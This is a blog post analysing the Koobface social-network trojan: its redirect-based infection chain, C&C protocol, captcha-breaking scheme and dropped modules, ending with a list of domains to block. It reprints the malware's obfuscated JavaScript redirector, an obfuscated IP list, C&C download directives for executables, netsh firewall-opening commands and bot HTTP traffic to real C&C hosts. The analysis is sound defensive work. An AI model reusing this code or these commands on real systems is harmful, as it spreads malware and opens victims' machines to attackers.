Tag Archive for 'social network'

Koobface – the social network trojan

The last few days I took a look at a trojan called “Koobface”. Due to the fact that the trojan isn’t really new, I’m pretty sure that many of you already heard about this trojan, but I just started to study the Koobface threat this week. First of all some general words about Koobface (for those of you which don’t know the trojan yet):

The trojan is targeting users of social networks like Facebook and Myspace. Therefore the trojan have it’s name (Koobface) from “Facebook”. The trojan uses different modules which will be dropped from the internet after a successful infection. For example there is a module for captcha breaking and a module to create Blogspot accounts.

Let’s start with the way the Koobface trojan spreads itself (this is quite interesting).

*** Koobface Infection vector ***
I’ve just made a small chart which describes the way Koobface spreads itself:

Koobface infection vector(click to enlarge)

As you can see on the chart above, Koobface is using a sophisticated strategy to hide the way it is infecting it’s victims. Initially the Koobface trojan publishes comments/posts on social networks like Facebook and Twitter (Stage 1) which are pointing to malicious blogspot / bit.ly URLs (Stage 2). These blogspot / bit.ly URLs has been registered previously by computers which are already infected with Koobface (bots) using a captcha breaking module (more on this later). The URLs in the second stage will redirect the victim to a hijacked website in the third stage. But thats not the end of the story: The hijacked websites hosting pages with a Javascript. The Javascript causes that the victim will be redirected again to the fourth stage which is finally spreading the trojan.

Here are some interesting stats about the amout of URLs which are used in this sophisticated attack:

Number of faked blogpost/bit.ly URLs in Stage 2: 34’332*
Number of hijacked websites in Stage 3: 509

* number still growing

You can view the full list of the faked blogspot/bit.ly URLs on the following page (the two lists will be updated in real time):

The list of hijacked websites won’t be published. But I can publish a statistical breakdown about the geo location of the hijacked websites used by koobface:

Koobface hijacked websites geo location
Click to enlarge

Let’s take a deeper look into the things happen in stage 2-4.
The blogpost URLs in the second stage contains Java Script code at the top of the page which will cause a redirection to a page in the third stage (the code vary):

<script>c6833='do';dc0d1bd="cqfiuqbemnit".replace(/[qfibent]+/g,"");ed9e='ent.r';
f1987="esafvnsaearvub".replace(/[savnub]+/g,"");ge2='rer';
ac8=eval(c6833+dc0d1bd+ed9e+f1987+ge2);b3c1='';h0cf16c3='mspli';
i7775="npkjdstd.dpcrloffrhm".replace(/[pjdtrlfh]+/g,"");j26='mys';
kb96="pdjaglfcfehrn.lfhcbomdk".replace(/[djglfhrnbk]+/g,"");l92='lnk';
m4ab1fa22=".vmblsdxw".replace(/[vbldxw]+/g,"");o5da6f7e8=ac8.indexOf(h0cf16c3+i7775);
p7e259a=ac8.indexOf(j26+kb96);q89=ac8.indexOf(l92+m4ab1fa22);
if(o5da6f7e8+p7e259a+q89!=-3)b3c1='&ms';
ncd1b57="hlbftqkmtmjpl:biff/gm/gbnmlbaqciinqbeklq.gfmnbmgag.qgoccchilobjbsit.
gbldjfcleck/c2m9jb2q/m"
.replace(/[lbfqkmjigc]+/g,"");
location=ncd1b57+"?biugbxosmt".replace(/[biuxsmt]+/g,"")+b3c1;</script>

The bit.ly URLs in in the second stage won’t need any additional code – they will redirect the victim to a hijacked websites in the third stage directly.

As I said before, the hijacked websites in the third stage are hosting Javascript code which causes that the victim will be redirected to the last stage which is finaly spreading the trojan. The IPs of the fourth stage webservers are hardcoded into the third stage javascript code (the list of IPs vary) :

var ipxgzet0 = [
'24.3' + '0.126.138',
'98.' + '206.3.117',
'90.' + '233.128.87',
'1' + '90.49.190.60',
'217.1' + '32.165.11',
'67' + '.173.62.160',
'6' + '6.57.229.246',
'17' + '4.103.205.78',
'84.1' + '09.34.247',
'79.176.' + '126.109',
'8' + '2.44.232.81',
'17' + '3.21.165.56',
'67.250' + '.29.114',
'99.15' + '5.75.173',
'1' + '73.29.194.142',
'7' + '1.236.10.136',
'94.171' + '.96.107',
'1' + '30.208.150.33',
'70.244.' + '114.178',
'99.1' + '2.240.214',
];

As you can see, the IPs are obfuscated. If you deobfuscate the list above you will find these IPs:

98.206.3.117
90.233.128.87
190.49.190.60
217.132.165.11
67.173.62.160
66.57.229.246
174.103.205.78
84.109.34.247
79.176.126.109
82.44.232.81
173.21.165.56
67.250.29.114
99.155.75.173
173.29.194.142
71.236.10.136
94.171.96.107
130.208.150.33
70.244.114.178
99.12.240.214

Finally the victim will be redirected to one of the IPs above which serves him a file called “setup.exe” (which contains the Koobface trojan):

Koobface stage 4
Click to enlarge

*** The Koobface Trojan ***
If the victim runs the binary (setup.exe), the Trojan will infect the computer creating the following file in the Windows directory:

C:\WINDOWS\ld15.exe (VT: 15/41 (36.59%))

Afterwards the trojan is testing the victims internet connection by sending a HTTP GET request to www.google.com:

GET / HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close

If google.com answers the trojan contacts one of the 509 hijacked websites, which are already being used previously in the third stage:

POST /.sys/?action=ldgen&v=15 HTTP/1.1
Host: xxxxxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

But its not as easy: The hijacked websites are just being used as redirectors/proxies which will forward the request from the infected client to the real Command&Control server (C&C):

Koobface Command&Control server infrastructureClick to enlarge

The traffic between the infected computer and the zombie/proxy is unencrypted. The answer of the Command&Control server starts with the string “#BLACKLABEL”. Due to this Koobface Command&Control server traffic is very easy to detect. The answer of the C&C server can look like this:

#BLACKLABEL
#GEO=FR
#IP=93.221.17.34
#PID=1000
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=go.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=fb.75.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=be.18.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=ms.25.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=hi.15.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=tg.14.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=tw.07.exe
START|http://savecedarcreekpark.com/.sys/?getexe=v2captcha.exe
START|http://savecedarcreekpark.com/.sys/?getexe=v2googlecheck.exe
#CACHE
MD5|ae404c09c11c31900dd72440802b89d9

#SAVED 2009-12-04 06:04:45

In this example, the C&C server just sent an order to the infected bot to download more executables. The executables (some kind of “modules”) will be downloaded and installed by Koobface. Within 36 hours I just found 13 unique MD5 hashes (=files) are dropped to the infected clients (bots):

v2webserver.exe ce6c3d55759c4ed19ec513313479d2b5 (VT 26/41 (63.41%))
v2prx.exe ea9173 cc0a85b804e6d7b764deeb0bbf (VT 37/41 (90.24%))
v2newblogger.exe 69eff369706bb3e4a077c092e2d7dc3e (VT 36/41 (87.80%))
v2googlecheck.exe cf9729bf3969df702767f3b9a131ec2c (VT 39/40 (97.50%))
v2captcha.exe f2d0dbf1b11c5c2ff7e5f4c655d5e43e (VT 39/41 (95.12%))
pp.12.exe 9bc9652e2e1c633bcbdcf9594956d74c (VT 25/41 (60.98%))
go.exe 02dfb635168279394c28ef334b8578b2 (VT 19/41 (46.34%))
fb.75.exe b50a54b54e64f87ac1dc5d3efff0662f (VT 29/41 (70.73%))
tw.07.exe f8b7a8489cc3af7009486d0b1a3a8327 (VT 36/41 (87.80%))
tg.14.exe df8e227f797340574a708e91064c2161 (VT 27/41 (65.85%))
hi.15.exe e94bb0d13a3e0089bf1b3726be5818c9 (VT 37/41 (90.24%))
ms.25.exe 040ffef821932d55cea2c81b8f085274 (VT 8/40 (20.00%))
be.18.exe 26d50e9034d5983ae941601207bb50eb (VT 30/40 (75.00%))

Fortunately all binaries have a very good AV detection rate.
Some additional notes: The parameter “getexe” will drop a binary from the C&C server down to the client. For example: If you send “getexe=v2googlecheck.exe” to the zombie/proxy, the C&C server will check if a file called “v2googlecheck.exe” exist in his file repository. If the file does not exist the C&C server will return a empty file.

In the second request the infected computer sends some information about the installed modules to the zombie/proxy (remember: the first request just contained the paramenter “action” and “v”):

GET /.sys/?action=ldgen&ff=1&a=-256673417&v=15&l=1000&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_tg=0&c_nl=0&iedef=0 HTTP/1.1
Host: xxxxxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close

*** Koobface captcha breaking infrastructure

Before we start with the modules/plugins which the Koobface trojan drops, we will take a look at the captcha breaking infrastructure used by Koobface. Koobface is using the two backed server to control the captcha breaking process:

  • capthcabreak.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)
  • captchastop.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)

The modules involved in the captcha breaking process (v2newblogger.exe and v2captcha.exe) are using these servers. I’ve create a small chart which will show the Koobface’s captcha breaking infrastructure:

Koobface captcha breaking infrastructureClick to enlarge

Some words about the way Koobface breaks captchas:

  • The way how Koobface breaks captchas is very sophisticated
  • The time between grabbing a captcha and breaking it is less than three minutes (most of the time just a few seconds!)
  • Due to the way how Koobface’s infrastructure works, it’s possible to break hunderds of captchas per minute!
  • In this way it’s possible to register thousends of fake bit.ly/Blogspot accounts per day

Additionally there is a interesting thing on the start page of the two domains used for captcha breaking. The sites are speaking about “Captcha Decoder Servis” including an contact E-Mail address, which looks like a commercial Captcha breaking service. The Koobface botnet obviously supplies enormous ressources for breaking captchas, like a ‘human’ grid computing network, so it would make sense to make part of it commercially available to third parties.

*** Koobface modules / plugins ***
Last but not least let’s take a look at a couple of Koobface modules dropped by the Command&Control server (C&C). Note that the cybercriminals can drop new files (modules) at any time.

v2prx.exe – A dnsfilter / dnsblocker module
Before we will take a look at the way this module works, we will look at a intersting relict of the author of this binary. If you look at the strings in the binary v2prx.exe you will find the following lines:

x:\work\softv2\dnsblocker\driver\devctrl.c
c:\WINDDK\inc\ddk\wdm.h
x:\work\softv2\dnsblocker\driver\devtcp.c
x:\work\softv2\dnsblocker\driver\devudp.c
x:\work\softv2\dnsblocker\driver\addr.c
x:\work\softv2\dnsblocker\driver\tcpconn.c
x:\work\softv2\dnsblocker\driver\tcprecv.c
x:\work\softv2\dnsblocker\driver\tcpsend.c
x:\work\softv2\dnsblocker\driver\udprecv.c
x:\work\softv2\dnsblocker\driver\udpsend.c
x:\work\softv2\dnsblocker\driver\packet.c
x:\work\softv2\dnsblocker\driver\ctrlio.c
x:\work\softv2\dnsblocker\driver\objchk_wxp_x86\i386\FIO32.pdb

These are relicts of the authors complier. You can also see that he used the Microsoft’s Windows Driver Kit (WDK).

The module will create two SYS-Files in the sysem32 directory:

C:\WINDOWS\system32\drivers\fio32.sys
C:\WINDOWS\system32\fio32.sys

Afterwards he connects to a Command&Control server at ze-biz.com (85.13.236.154 – COREIX-UK-AS Coreix Limited London):

GeT /v50/?v=97&s=I&uid=-256673417&p=1000&q= HttP/1.0
HoST: 85.13.236.154
UsER-AgENt:

Notice the spelling of the strings in the HTTP header (case senstivie). The C&C server will tell the module which domains he should filter/block and which HTTP request he have to redirect to the Command&Control server.

v2webserver.exe – A simple webserver used to spread Koobface
This module will turn the victims computer into a webserver. A very interesting thing is the fact that this binary won’t be dropped to every bot. For comparison: The captcha breaking module (v2captcha.exe) has been dropped to my test script 419 times while I have seen v2webserver.exe just 197 times. Conclusion: Not every bot will be transformed in a “zombie” (which would be used by Koobface’s infection process Stage 4).

The module will install it self in the Program Files directory….

C:\Program Files\webserver\webserver.exe

File: webserver.exe
File size: 13312 bytes
MD5 : ce6c3d55759c4ed19ec513313479d2b5
VT: 26/41 (63.41%)

…and will try to open port 80 (HTTP) and port 53 (DNS) on the Windows Firewall by using the following commands:

netsh firewall add portopening TCP 53 webserver.exe ENABLE
netsh firewall add portopening TCP 80 webserver.exe ENABLE
netsh add allowedprogram “procname.exe” webserver.exe ENABLE

Afterwards the module will try to look up aol.com and www.imageshack.com. If the request is successful, he will ping the IP address of aol.com (207.200.74.38) and www.imageshack.com (64.202.189.170). The module will detect the response time of the PING packed sended to aol and imageshack and will report it to the Koobface Command&Control server:

POST /webserver/?uptime=3&v=0&sub=60&ping=114&proxy=0&hits=0 HTTP/1.0
Host: uuu20091124.info
Content-Type: binary/octet-stream
Content-Length: 0

Additionally the module also reports the Clients uptime and how many hits the webserver had. If you now check the client port 80 you will see the following code:

Page moved <a href="#" onclick="javascript:location.reload();return false;">here</a>.
<script>setTimeout('location.reload()', 1000)</script>

Et Voilà – the computer can now be used as zombie/proxy in Koobface’s Command&Control server infrastructure and as server in the fourth stage in Koobface’s infection process.

v2newblogger.exe – A module to create new Blogspot URLs (Google)
The module v2newblogger.exe will try to create new Blogspot’s URLs. Let’s see how this works.

Initially the module tries to connect to news.google.com (requesting the “Top Stories” RSS feed):

GET /news?ned=us&output=rss HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: news.google.com
Connection: Keep-Alive

It uses title and content of the Top story later to create a post on Google blogspot. In the next step the module will call the Command&Control server capthcabreak.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada) and will request a username which the module will use for blogspot.com

GET /blogspot/newblogger.php?a=names&ver=12 HTTP/1.0
Host: capthcabreak.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2
Connection: close

The C&C server will response with a random firstname, lastname and a username:

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: text/html

Ursdilla
Knous
KnousUrsdilla

In the next step the module calls mail.google.com/mail/signup to create a new Google Account. The web form is protected by a captcha – but that is no problem for Koobface: He will grab the captcha (image) and send it to the C&C server:

POST /captcha/?a=save&b=goo HTTP/1.0
Host: capthcabreak.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2
Content-Type: binary/octet-stream
Connection: close
Content-Length: 2694

The C&C server will return a task ID for this captcha:

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

15611345

A few seconds later the module will call the C&C server again and asks the status of the Task ID:

GET /captcha/?a=query&b=goo&id=15611345 HTTP/1.0
Host: capthcabreak.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2
Connection: close

and the C&C server will response with the status of the task (and if available the result of the captcha):

HTTP/1.1 200 OK
Date: Sat, 05 Dec 2009 10:30:34 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

3|dreamyter

The C&C server will return a status code (3) followed by the captcha (dreamyter). Now it’s possbile for the module to create the account without any problems.

v2googlecheck.exe – A module to check Facebook for blocked URLs
OK this module is REALLY interesting – it is used to check if a Blogspot or bit.ly URL is blocked at Facebook. Some background information: If you see a URL on Facebook and you think its malicious you can report it to Facebook. Facebook will then check if the URL is malicious. If so, Facebook will block the URL:

Facebook blocks Koobface URLs(click to enlarge)

To react against this “problem”, the Koobface gang drops the binary “v2googlecheck.exe”.
First of all the module will report its version to the Koobface C&C (capthcabreak.com):

GET /check/in.php?v=7 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Connection: Keep-Alive

The C&C server will answer the with a Blogspot or bit.ly URL :

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

28

http://kaileywali.blogspot.com/

191720

0

The C&C server answers with a Blogspot or bit.ly URL and a Task ID (191720)
Now the module will check if the URL is blocked on Facebook by calling a script called l.php located on facebook.com:

GET /l.php?u=http%3A%2F%2Fkaileywali.blogspot.com%2F HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive

If the blogspot URL is blocked by Facebook, Facebook will return a error page (as seen before). Otherwise the request will be redirected to the blogpost URL. Anyway, the module will save the response body from Facebook and will send it back to the C&C server:

POST /check/blocked.php?v=7&url=http%3A%2F%2Fkaileywali.blogspot.com%2F HTTP/1.1
Accept: */*
Content-Type: binary/octet-stream
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Content-Length: 13551
Connection: Keep-Alive
Cache-Control: no-cache

A few seconds later the module will check the status of his previous submission by calling the C&C server using the Trask ID he recived from the C&C server before (191720):

POST /check/out.php?v=7 HTTP/1.1
Accept: */*
Content-Type: binary/octet-stream
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Content-Length: 9
Connection: Keep-Alive
Cache-Control: no-cache

191720

The C&C will answer with 0 which will close/finish the task.

v2captcha.exe – The captcha breaking module
This module will frequently call the C&C server for new captchas to break. The request which the module sends to the C&C server looks like this:

GET /captcha/?a=get&i=0&v=14 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Connection: Keep-Alive

The C&C server will check if he has a captcha to break. If not, the C&C server just return 0, otherwise the C&C server will return a Task ID and a captcha which the bot have to break:

HTTP/1.1 200 OK
Date: Sat, 05 Dec 2009 11:37:51 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

95
11623014|http://captcha.com/captcha/tmp/11623014.jpg|Enter both words below, separated by a space.|([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)
0

The module will request the captcha-image from the server (captcha.com) and will freez the computer screen with the message “Type the characters you see in the picture below”. To unlock the screen, the user must enter the captcha served by Koobface:

Koobface captcha breaking moduleClick to enlarge

Sure, Koobface don’t know the solution of the captcha, so you can submit a wrong result. But Koobface will check at least the lenght of your submission. If the user enter the result of the captcha, the module will send it back to the C&C server including the Task ID retrived from the C&C server before:

GET /captcha/?a=put&id=191720&v=14&code=misterwis%20schole HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Connection: Keep-Alive

*** Conclusion ***
In most case the binaries dropped by Koobface have a very good AV detection rate. However the Koobface trojan has some sophisticated tricks to spear it self. It is the first “big” trojan which uses social networks to spread itself. So it comes to the question if social networks are threats for corporate networks and if they should ban social networks out of the office.

Another problem is the module which is checking if a blogspot / bit.ly URL is already blocked on facebook. The Koobface gang knows how many faked URLs are currently active and how many are banned from Facebook. So its nearly usless to ban the fake URLs from Facebook and try to suspend/delete the involved blogspot / bit.ly URLs: Koobface just need a few minutes to react and create new fake blogpost / bit.ly URLs which Koobface can use in its infection process.

Another point is the fact, that every one is talking about “web 2.0″ – and most people are unawar of web 2.0 threats. As I said before, Koobface is the first big social network trojan – but I’m really sure it won’t be the last one. Trojans which are using web 2.0 to spread themselves don’t need to care about spam filters and email addresses. They can bypass the corporates (strong) email filter by using web 2.0.

Finally the security industry have to ask itself if captchas are still secure or not. The fact that there already commercial “Captcha Decoder Servis” worries me.

*** Domains to block ***
The following domains should be blocked on corporate gateways/firewalls:

Domain A reocrd AS number AS name Country
uuu20091124.info 67.212.78.65 10929 Netelligent Hosting Services Inc. Canada
captchastop.com 67.212.69.230 10929 Netelligent Hosting Services Inc. Canada
capthcabreak.com 67.212.69.230 10929 Netelligent Hosting Services Inc. Canada
ze-biz.com 85.13.236.154 31708 COREIX-UK-AS Coreix Limited United Kingdom


*** Further reading ***




economics-recluse
Scene
Urgent!